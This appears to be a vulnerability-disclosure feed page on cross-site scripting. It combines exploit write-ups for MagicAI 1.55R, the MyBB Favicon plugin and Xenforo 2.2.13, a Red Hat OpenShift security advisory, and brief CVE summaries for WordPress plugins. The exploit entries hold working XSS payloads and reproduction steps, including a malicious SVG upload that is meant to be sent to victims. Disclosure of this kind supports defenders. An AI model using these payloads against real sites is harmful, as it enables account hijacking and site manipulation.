MagicAI version 1.55R suffers from a persistent cross site scripting vulnerability via a file upload.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://magicai.liquid-themes.com/                                         ││  Vendor   : MagicAI                                                                    ││  Software : MagicAI 1.55R                                                              ││  Vuln Type: Stored XSS via File Upload                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Steps to Reproduce:1. Go to [Settings] on this Path (https://website/dashboard/user/settings)2. Upload any Image in Avatar to capture the request in Burp Suite3. Replace image.png with image.svg in [filename] and add this SVG with HTML Included----------------------------------------------------------------------------------------POST /dashboard/user/settings/save HTTP/2Content-Disposition: form-data; name="avatar"; filename="image.svg"Content-Type: image/png<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105"><html><head><title>test</title></head><body><script>alert('xss');</script></body></html></svg>----------------------------------------------------------------------------------------4. Send the Request5. Back to the Path (https://website/dashboard/user/settings)6. Refresh the Page7. Capture the Link of your Uploaded svg in [Burp Logger] GET (https://website/upload/images/avatar/****-culote-mia-avatar.svg)8. Send SVG Link to Victims9. XSS Executed![-] Done

MagicAI 1.55R Cross Site Scripting

MyBB Favicon plugin version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: MyBB [PGM] Favicon Plugin 1.0 – Cross-Site Scripting# Date: May 2, 2023# Author: 0xB9# Twitter: @0xB9sec# Software Link: https://community.mybb.com/mods.php?action=view&pid=1554# Version: 1.0# Tested On: Windows 10Description:The favicon input in the settings doesn’t sanitize the favicon URL.Proof of Concept:– In the admin dashboard go to Configuration > Settings > Favicon– Enter the following payload in the URL input: “><script>alert(1)</script>.ico– Visit any page on the forum to trigger the payload

MyBB Favicon 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-3625-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.62. Issues addressed include bypass, cross site request forgery, cross site scripting, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.10.62 security update  
Advisory ID:       RHSA-2023:3625-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3625  
Issue date:        2023-06-23  
CVE Names:         CVE-2022-41966 CVE-2023-20860 CVE-2023-32977   
                   CVE-2023-32979 CVE-2023-32980 CVE-2023-32981   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.62 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.10 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.62. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3626

Security Fix(es):

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
(CVE-2023-20860)

* jenkins-2-plugin: workflow-job: Stored XSS vulnerability in Pipeline: Job  
Plugin (CVE-2023-32977)

* jenkins-2-plugin: email-ext: Missing permission check in Email Extension  
Plugin (CVE-2023-32979)

* jenkins-2-plugin: email-ext: CSRF vulnerability in Email Extension Plugin  
(CVE-2023-32980)

* jenkins-2-plugin: pipeline-utility-steps: Arbitrary file write  
vulnerability on agents in Pipeline Utility Steps Plugin (CVE-2023-32981)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow  
2180528 - CVE-2023-20860 springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
2207830 - CVE-2023-32977 jenkins-2-plugin: workflow-job: Stored XSS vulnerability in Pipeline: Job Plugin  
2207831 - CVE-2023-32979 jenkins-2-plugin: email-ext: Missing permission check in Email Extension Plugin  
2207833 - CVE-2023-32980 jenkins-2-plugin: email-ext: CSRF vulnerability in Email Extension Plugin  
2207835 - CVE-2023-32981 jenkins-2-plugin: pipeline-utility-steps: Arbitrary file write vulnerability on agents in Pipeline Utility Steps Plugin

6. Package List:

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el7.src.rpm  
openshift-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el7.src.rpm  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el7.src.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el7.src.rpm

noarch:  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el7.noarch.rpm  
openshift-ansible-test-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el7.noarch.rpm

x86_64:  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el7.x86_64.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el7.x86_64.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el7.x86_64.rpm  
openshift-clients-redistributable-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el7.x86_64.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.src.rpm  
jenkins-2-plugins-4.10.1685679861-1.el8.src.rpm  
jenkins-2.401.1.1685677065-1.el8.src.rpm  
kernel-4.18.0-305.93.1.el8_4.src.rpm  
kernel-rt-4.18.0-305.93.1.rt7.168.el8_4.src.rpm  
openshift-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.src.rpm  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el8.src.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.src.rpm

aarch64:  
bpftool-4.18.0-305.93.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.aarch64.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.aarch64.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.aarch64.rpm  
kernel-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-305.93.1.el8_4.aarch64.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.aarch64.rpm  
perf-4.18.0-305.93.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.93.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm

noarch:  
jenkins-2-plugins-4.10.1685679861-1.el8.noarch.rpm  
jenkins-2.401.1.1685677065-1.el8.noarch.rpm  
kernel-doc-4.18.0-305.93.1.el8_4.noarch.rpm  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el8.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.93.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.ppc64le.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.ppc64le.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.ppc64le.rpm  
kernel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-ipaclones-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.ppc64le.rpm  
perf-4.18.0-305.93.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.93.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.93.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.s390x.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.s390x.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.s390x.rpm  
kernel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.s390x.rpm  
perf-4.18.0-305.93.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
python3-perf-4.18.0-305.93.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.93.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.x86_64.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.x86_64.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.x86_64.rpm  
kernel-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-ipaclones-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-rt-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-modules-internal-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-modules-internal-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-selftests-internal-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-305.93.1.el8_4.x86_64.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.x86_64.rpm  
perf-4.18.0-305.93.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.93.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2023-20860  
https://access.redhat.com/security/cve/CVE-2023-32977  
https://access.redhat.com/security/cve/CVE-2023-32979  
https://access.redhat.com/security/cve/CVE-2023-32980  
https://access.redhat.com/security/cve/CVE-2023-32981  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJYTh9zjgjWX9erEAQh4mQ//XdFhFaXf/s5HOqOrjdm7tTJNHJ/C8tqG  
SxPUy+Eto4VtDbN/oET9uSy/a7c5LteR1YXwAkfSQZwlPPE/4Ok94nmEzXl4LVx4  
j+zwcIWsC3+WPTPzslf4tgljD+BfO43xXUyHahOGpUUFnYJ1R7mtBmgYx9qiiZ63  
AO2QgJbcsvKv4mTeHrGQK4ALqe47zsDW88IxA9ki+e9jxhy1tZwNjt8Z8rcJLesI  
jbmQCsPtWuJCddlzNcUpGYa8bWq5tLvHTzAprqjJMb8HwiMmLOWCAeorJYBVdhfZ  
5d0VpBxpWJv7WVWHzu7SObOsLXmcLU90uqTyKgkbp6OXTnj1O0fKde6EL7ISgr2Q  
qL5rjkL/01Gy2Iv2cyHRHIHCFEXtdbHOXdpwA7H5TysR35HRdb6iSUQK+5KdNgay  
3NAcfCxSmyF8Pq3P3sDY3YG7fYv/Xom3GO0oqqJHmP/AU4TbdnTGTl5fT7ZeQQxH  
09vF8z2myZl1Sr9njAGOvLTrJ21B8/mMJp8upfV7wqaPGHqyA4S0KydkDyzGwcQ5  
h+QzoekXuzTKBjjI7ZqZrwoZquIWgwL9IRxlejQLtgnnmEnBu/kbUtbrgB7PGMXW  
HLnn87J8Xk+VI59y8dV0EctvOl9ZLv3smbT6GKdBGYa56Np+yRIjQRYJ511GZihw  
+M8bdNZNn+k=  
=E1Cz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3625-01

Xenforo version 2.2.13 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS# Date: 2023-06-24# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: https://x.com/admin.php?smilies# Version: 2.2.12 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /admin.php?smilie-categories/0/save HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/admin.php?smilies/X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422Content-Length: 1038Origin: http://127.0.0.1Connection: closeCookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616851,83fd2350307156281e51b17e20fe575b-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="title"<img src=x onerror=alert(document.domain)>-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="display_order"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfRequestUri"/admin.php?smilies/-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfWithData"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616849,b74724a115448b864ba2db8f89f415f5-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfResponseType"json-----------------------------333176689514537912041638543422--Response: After it is created, an alert comes immediately.

Xenforo 2.2.13 Cross Site Scripting

The Aajoda Testimonials WordPress plugin before 2.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

CVE-2023-2178

The Accordion & FAQ WordPress plugin before 1.9.9 does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting

CVE-2023-1891

The Kanban Boards for WordPress plugin before 2.5.21 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2023-0873

The USM-Premium WordPress plugin before 16.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2023-1166

The Editorial Calendar WordPress plugin through 3.7.12 does not sanitise and escape its settings, allowing users with roles as low as contributor to inject arbitrary web scripts in the plugin admin panel, enabling a Stored Cross-Site Scripting vulnerability targeting higher privileged users.

CVE-2022-4115

The Catalyst Connect Zoho CRM Client Portal WordPress plugin before 2.1.0 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admin.

Tag

#xss